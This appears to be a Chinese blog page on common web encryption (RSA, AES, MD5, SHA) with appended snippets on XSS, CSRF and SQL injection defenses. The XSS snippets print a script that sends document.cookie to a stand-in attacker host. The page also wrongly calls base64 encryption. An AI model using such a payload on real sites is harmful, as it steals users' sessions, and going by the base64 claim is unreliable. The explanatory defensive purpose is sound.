常见的web加密手段

加密算法

1.非对称加密公开密钥加密，是加密和解密使用不同密钥的算法，广泛用于信息传输中。

常见的算法有：RSA、ElGamal、Rabin。

2.对称加密将信息使用一个密钥进行加密，解密时使用同样的密钥，同样的算法进行解密。

常见的算法有：DES、3DES、AES。

摘要算法(散列算法)

1.md系列常见的算法有MD5、MD4、MD3、MD2。

2.sha系列常见的算法有SHA-1、SHA-224、SHA-256、SHA-384、SHA-512。

区别：

加密算法作用是提高信息的保密性。

加密算法是可逆。

例子：服务器对数据进行加密，发送它一个安全的SSL连接到浏览器，浏览器解密，就可以看到解密的内容。

散列算法作用是验证信息的完整性。

散列算法不可逆。

例子：网站用户登陆的密码，登陆输入的密码与注册的密码的生成的摘要算法值（如：md5）进行匹配，匹配成功就登入成功。

实际项目中，散列算法常常也用于加密，还有一些其他的加密手段，如：base64加密。（利用编码加密方式）

PS：2005年，中国密码学家王小云教授领导的小组利用杂凑函数碰撞成功破解MD5密码算法，SHA-1密码算法。（只是缩短了一些破译的时间）

时间： 2024-10-04 08:46:43

常见的web加密手段的相关文章

常见的web攻击手段

XSS:跨站脚本攻击 -典型实例为: 当用户在表达输入一段数据后,提交给服务端进行持久化.如果此用户输入的是一段脚本语言,而服务端用户输入的数据没有经过转码.校验等就存入了数据库,在其他页面需要展示此数据时,就会执行此用户输入的语言.简单来说,JS的强大不用我来解释吧 -推荐防御措施: 对用户输入的信息进行转义,例如<>'等等特殊字符.当然,其实很多前端框架也支持这么做,快查一查你使用的框架支持么. CRSF:跨站请求伪造 -典型实例为: 如果A银行存在CRSF漏洞,有用户在登陆完A银行后没

总结几种常见web攻击手段及其防御方式

本文简单介绍几种常见的攻击手段及其防御方式 XSS(跨站脚本攻击) CSRF(跨站请求伪造) SQL注入 DDOS web安全系列目录总结几种常见web攻击手段极其防御方式总结几种常见的安全算法 XSS 概念全称是跨站脚本攻击(Cross Site Scripting),指攻击者在网页中嵌入恶意脚本程序. 案列比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样的 <script>window.open("www.gongji.com?param="

总结几种常见web攻击手段极其防御方式

本文简单介绍几种常见的攻击手段及其防御方式 XSS(跨站脚本攻击) CSRF(跨站请求伪造) SQL注入总结几种常见web攻击手段极其防御方式 XSS 概念全称是跨站脚本攻击(Cross Site Scripting),指攻击者在网页中嵌入恶意脚本程序. 案列比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样的 <script>window.open("www.gongji.com?param="+document.cookie)</scrip

常见的web安全问题总结

we安全对于web前端从事人员也是一个特别重要的一个知识点,也是面试的时候,面试官经常问的安全前端问题.掌握一些web安全知识,提供安全防范意识,今天就会从几个方面说起前端web攻击和防御的常用手段常见的web攻击方式 1.XSS XSS(Cross Site Scripting)跨站脚本攻击,因为缩写和css重叠,所以能叫XSS,跨脚本攻击是指通过存在安全漏洞的web网站注册用户的浏览器内非法的非本站点HTML标签或javascript进行一种攻击. 跨站脚本攻击有可能造成以下影响 1.利用

前端面试---常见的web安全及防护原理

一.常见的web安全及防护原理 1.sql注入原理就是通过把sql命令插入到web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 防护,总的来说有以下几点: 1.永远不要信任用户的输入,要对用户的输入进行校验,可以通过正则表达式,或限制长度,对单引号双"--"进行转换等. 2.永远不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取. 3.永远不要使用管理员权限进行数据库连接,为每个应用使用单独的权限有限的数据库连接.

bootstrap 栅格系统 HTTP协议软件架构 B/S C/S 常见的WEB服务器

Day32 bootstrap Bootstrap就是响应式布局最成功的实现,为了兼容不同的浏览器采用jQuery,为了适配不同的终端采用CSS3 Media Query (媒体查询) 1.1.1 栅格系统 l 帮助手册:全部CSS样式/栅格系统,http://v3.bootcss.com/css/#grid-options l Bootstrap 提供了一套响应式.移动设备优先的流式栅格系统,随着屏幕或视口(viewport)尺寸的增加,系统会自动分为最多12列. l 栅格特点 n "行(ro

【转】常见六大Web 安全攻防解析

原文转自:https://segmentfault.com/a/1190000018073845 作者:浪里行舟在互联网时代,数据安全与个人隐私受到了前所未有的挑战,各种新奇的攻击技术层出不穷.如何才能更好地保护我们的数据?本文主要侧重于分析几种常见的攻击的类型以及防御的方法. 一.XSS XSS (Cross-Site Scripting),跨站脚本攻击,因为缩写和 CSS重叠,所以只能叫 XSS.跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或Java

常见六大Web安全攻防解析

一.XSSXSS (Cross-Site Scripting),跨站脚本攻击,因为缩写和 CSS重叠,所以只能叫 XSS.跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击. 跨站脚本攻击有可能造成以下影响: 利用虚假输入表单骗取用户个人信息.利用脚本窃取用户的Cookie值,被害者在不知情的情况下,帮助攻击者发送恶意请求.显示伪造的文章或图片.XSS 的原理是恶意攻击者往 Web 页面里插入恶意可执行网页脚本代码,当用户浏览

web加密的基本概念

1.需求了解web加密的一些基础概念. 2.基本概念 a.对称加密方式对称加密方式加密和解密用同一个密钥不足之处是,交易双方都使用同样钥匙,安全性得不到保证.此外,每对用户每次使用对称加密算法时,都需要使用其他人不知道的惟一钥匙,这会使得发收信双方所拥有的钥匙数量呈几何级数增长 b.非对称加密方式非对称加密算法需要两个密钥:公开密钥(publickey)和私有密钥(privatekey).公开密钥与私有密钥是一对,如果用公开密钥对数据进行加密,只有用对应的私有密钥才能解密;如果用私有密